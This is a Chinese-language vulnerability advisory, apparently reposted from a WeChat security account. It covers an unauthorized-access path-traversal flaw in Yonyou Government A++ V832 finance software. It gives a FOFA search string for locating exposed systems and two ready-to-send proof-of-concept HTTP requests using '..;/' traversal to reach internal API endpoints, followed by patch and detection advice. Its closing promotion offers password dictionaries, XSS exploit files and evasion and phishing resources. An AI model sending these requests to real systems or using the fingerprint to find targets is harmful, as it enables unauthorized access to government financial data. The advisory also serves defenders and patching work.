漏洞情报-用友政务A++V832产品未授权访问漏洞

admin
admin
admin
138635
文章
114
评论
2024年2月19日11:45:10评论185 views字数 2084阅读6分56秒阅读模式
漏洞情报-用友政务A++V832产品未授权访问漏洞

用友政务A++V832产品未授权访问漏洞

前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请联系。

由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!

漏洞情报-用友政务A++V832产品未授权访问漏洞

漏洞详情:

用友政务A++综合计划财务产品,以平台化应⽤、智能化管控、专业化服务为技术、服务理念,以独创的面向岗位角色产品定义思想,综合利用JAVA、智能表单、工作流及最新的互联网、云计算、移动应用等先进技术;融合部门综合计划财务管理领域内的预算编报与分配、预算执行控制、资金计划审批、财务报销、合同支付、集中核算、汇总报表、财务监督、领导查询决策,以及财务服务、移动审批等应⽤共同构成了A++平台软件产品。

原理分析:

由于安全控制不严格,攻击者可以通过目录穿越的方式未授权访问接口。

影响范围:

用友政务A++V832产品

资产测绘

FOFA:body="/pf/portal/login/css/fonts/style.css"
漏洞情报-用友政务A++V832产品未授权访问漏洞

漏洞利用

路径为 /pub/fe/config/..;/..;/..;/ma/asval/getAll 和

/pub/fe/config/..;/..;/..;/ga/riskClassify/getClassifyTree

0X01:

pocGET /pub/fe/config/..;/..;/..;/ma/asval/getAll HTTP/1.1Host: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close
漏洞情报-用友政务A++V832产品未授权访问漏洞

0X02:

GET /pub/fe/config/..;/..;/..;/ga/riskClassify/getClassifyTree HTTP/1.1Host: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close
漏洞情报-用友政务A++V832产品未授权访问漏洞

漏洞修复建议

1、升级系统到最新版本

https://security.yonyou.com/#patchInfoidentifier=c55fc3eaf975450190788e13a8cd7f7f

2、检测数据包中可能包含明显的目录穿越痕迹,如使用..;/等路径。

漏洞情报-用友政务A++V832产品未授权访问漏洞

关于我们:

感谢各位大佬们关注-不秃头的安全,后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖挖掘SRC思路等文章,同时会组织不定期抽奖,希望能得到各位的关注与支持。

关注福利:

回复“google工具" 获取 google语法生成工具

回复“burp插件" 获取 bp常用插件打包。

回复“暴力破解字典" 获取 各种常用密码字典打包

回复“XSS利用文件" 获取 现成XSS利用文件.pdf

回复“蓝队工具箱即可获取一款专业级应急响应的集成多种工具的工具集

知识星球

星球里有什么?

web思路及SRC赏金,攻防演练资源分享(免杀,溯源,钓鱼等),各种新鲜好用工具,poc定期更新

提前续费有优惠,好用不贵很实惠

漏洞情报-用友政务A++V832产品未授权访问漏洞

交流群

关注公众号回复“加群”,QQ群可直接扫码添加

漏洞情报-用友政务A++V832产品未授权访问漏洞
漏洞情报-用友政务A++V832产品未授权访问漏洞

安全考证

需要考以下各类安全证书的可以联系我,价格优惠、组团更便宜,CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP......

漏洞情报-用友政务A++V832产品未授权访问漏洞

往期推荐

漏洞情报-用友政务A++V832产品未授权访问漏洞

CNVD通用型漏洞挖掘-app逻辑缺陷的两个挖掘案例

实战案例:记一次利用SpringBoot相关RCE漏洞拿下某数字化平台系统

黑客如何玩幻兽帕鲁????快来学习

蓝队应急响应工具箱v2024.1

漏洞情报-用友政务A++V832产品未授权访问漏洞

球分享

漏洞情报-用友政务A++V832产品未授权访问漏洞

球点赞

漏洞情报-用友政务A++V832产品未授权访问漏洞

球在看

原文始发于微信公众号(不秃头的安全):漏洞情报-用友政务A++V832产品未授权访问漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月19日11:45:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞情报-用友政务A++V832产品未授权访问漏洞https://cn-sec.com/archives/2504937.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息